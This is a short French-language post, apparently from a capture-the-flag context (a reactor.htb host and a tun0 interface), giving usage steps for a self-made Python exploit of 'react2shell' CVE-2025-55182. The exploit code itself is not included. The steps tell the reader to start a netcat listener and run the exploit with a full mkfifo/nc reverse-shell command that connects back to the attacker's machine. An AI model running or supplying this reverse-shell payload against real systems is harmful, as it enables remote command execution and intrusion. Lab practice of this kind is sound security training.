
J'ai créé un simple exploit python react2shell CVE-2025-55182
J'ai créé un exploit python simple pour react2shell CVE-2025-55182
UTILISATION
Enregistrez le script : Sauvegardez le code ci-dessus sous exploit.py.
Mettez à jour les hôtes : Assurez-vous que reactor.htb résout l'IP cible dans votre fichier /etc/hosts. echo "<TARGET_IP> reactor.htb" | sudo tee -a /etc/hosts
Démarrez l'écouteur : Ouvrez un terminal pour recevoir le shell inverse. nc -lvnp 4444
Exécutez l'exploit : Lancez le script avec un payload de shell inverse. python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f"
Remplacez <YOUR_IP> par l'adresse IP de votre interface tun0.